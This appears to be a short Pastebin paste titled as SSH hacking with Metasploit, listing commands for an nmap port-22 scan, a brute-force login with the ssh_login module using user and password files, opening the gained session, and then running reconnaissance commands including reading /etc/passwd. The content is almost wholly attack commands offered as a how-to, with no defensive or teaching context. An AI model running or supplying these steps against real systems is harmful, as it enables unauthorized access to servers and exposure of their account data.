Advertisement
PSN_CR33P

Recon on SSH Server Using Metasploit

Mar 27th, 2019
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.48 KB | None | 0 0
  1. ##################################################SPED-SEC###############################################################
  2. # Title : Hacking SSH Server Using Metasploit
  3. # Tested On : [ Kali-Linux ]
  4. ######################
  5. # [+] COMMENDS :
  6. ######################
  7. msfconsole
  8. db_status
  9. db_nmap -sS ip -p 22
  10. search ssh
  11. use auxiliary/scanner/ssh/ssh_login
  12. show options
  13. set RHOSTS ...
  14. set PASS_FILE ....
  15. set USER_FILE
  16. run
  17. sessions -i 1
  18.  
  19.  
  20. ifconfig
  21. uname -a
  22. cat /etc/passwd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement